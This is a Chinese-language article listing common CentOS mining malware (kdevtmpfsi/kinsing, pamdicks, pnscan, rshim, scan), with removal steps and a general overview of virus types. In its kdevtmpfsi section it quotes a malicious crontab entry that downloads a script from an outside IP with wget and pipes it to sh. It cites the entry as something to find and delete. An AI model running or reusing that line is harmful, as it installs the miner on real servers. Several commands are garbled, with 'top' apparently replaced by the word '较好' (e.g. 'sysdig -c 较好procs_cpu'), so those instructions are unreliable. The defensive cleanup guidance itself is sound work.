centos病毒有哪些

centos病毒有：1.kdevtmpfsi病毒；2.pamdicks病毒；3.pnscan病毒；4.rshim病毒；5.scan病毒。kdevtmpfsi病毒是入侵centos系统的一种常见挖矿病毒，要解决该病毒引起的CPU占用问题，除了要删掉kdevtmpfsi进程外，还需要将其守护进程kinsing清理掉。

1.kdevtmpfsi病毒

kdevtmpfsi是一个挖矿病毒，大多数都是redis程序侵入，通常比较明显就是占用高额的CPU、内存资源。kdevtmpfsi有守护进程，单独kill掉kdevtmpfsi进程会不断恢复占用，其守护进程名称为kinsing，需要kill后才能解决问题。具体解决方法：（1）先去相应的云服务商那里修改安全组，暂时关闭所有相关服务的端口，防止病毒重新感染；

（2）依次杀掉kinsing 和kdevtmpfsi 对应的进程（kinsing 是kdevtmpfsi 病毒的守护进程）；

（3）删除kdevtmfsi病毒的脚本；

（4）检查crontab，如果发现有这条* * * * * wget -q -O – http://195.3.146.118/sc.sh|sh > /dev/null 2>&1，就删掉；

（5）给那些没有设置密码且暴露了端口的服务，设置相应的密码，并重启。如果业务需要，就开放回相应的端口，恢复服务。

2.pamdicks病毒

pamdicks病毒属于挖矿木马病毒，也是入侵centos7系统的常见病毒之一。该病毒引起的故障现象为：开发使用过程中，发现经常有服务无故关闭，登录服务器经检查，发现CPU使用率达到100%。在检测异常进程中，未发现CPU使用率异常的进程（使用较好 以及ps -aux 进行检查）。

临时处理办法：根据系统环境变量，检查各目录下是否存在pamdicks，共计有两个/usr/bin/pamdicks和/bin/pamdicks；删除原文件，并创建一个顶包空文件，然后使用系统chattr对其进行锁定禁止修改；再根据sysdig -c 较好procs_cpu查到的PID直接杀掉。

3.pnscan病毒

pnscan是比较有名的挖矿蠕虫病毒，攻击手段为通过redis感染服务器，如果redis的端口为默认的6379且暴露在公网上，且没有设置客户端连接密码认证，很容易感染，这个病毒是分级别的。解决方法如下：

（1）首先通过busybox 较好查看pnscan的路径，

（2）删除pnscan，可能文件是只读的，不能被删除，需要通过busybox lsattr 文件名查看文件的属性，一般属性是-a或者-i，然后执行busybox chattr –a/-i 文件名更改文件属性后即可删除

（3）杀掉pnscan相关进程。

4.rshim病毒

rshim病毒也是挖矿病毒的一种，常见于以root用户启动redis服务，并且redis使用默认端口，导致6379端口被攻击。解决方法跟pnscan差不多，在查找文件和进程的时候，发现由hilde用户执行，在home目录下多了个hilde目录，里面创建了免密登录的公钥，需要hilde整个目录删除，之后执行userdel –r hilde删除该用户。

5.scan病毒

scan也是通过redis进行攻击的，如果电脑cpu占满也可能是因为这个进程，解决方案跟上面相似，也是先查路径，再删文件，再杀进程。

延伸阅读

电脑系统常见的病毒种类有哪些

1.文件型病毒

文件型病毒是一种受感染的可执行文件，也就是.exe病毒文件。当执行受感染的文件时，电脑病毒会将自己复制到其他可执行文件中，导致其他文件受感染。

2.宏病毒

宏病毒专门感染Word文档，是利用微软的VB脚本语言开发出来的程序，以宏的方式附在Word文档中，称之为宏病毒。

3.挖矿病毒

挖矿病毒入侵以后，电脑系统CPU占用接近100%；系统卡顿执行基本命令响应缓慢；系统出现异常进程无法正常kill；系统内存异常占用不稳定。

4.特洛伊木马

黑客常利用特洛伊木马，来窃取用户的密码资料或破坏硬盘内程序或数据的目的，它看似是一个正常的程序，但执行时隐藏在其背后的恶意程序也将随之行动，就会对电脑进行破坏。但该特洛伊木马不会自行复制，因此往往是以伪装的样式诱骗电脑用户将其置入电脑中。

5.蠕虫病毒

蠕虫病毒蠕虫病毒利用网络快速地扩散，从而使更多的电脑遭受病毒的入侵，是一种自行复制的可由网络扩散的恶意程序。

6.引导型病毒

引导型病毒主要感染硬盘的主引导扇区，导致计算机无法正常启动。

7.混合型病毒

这种病毒兼有引导型病毒和文件型病毒的综合特点，既感染主引导扇区，又会感染和破坏文件。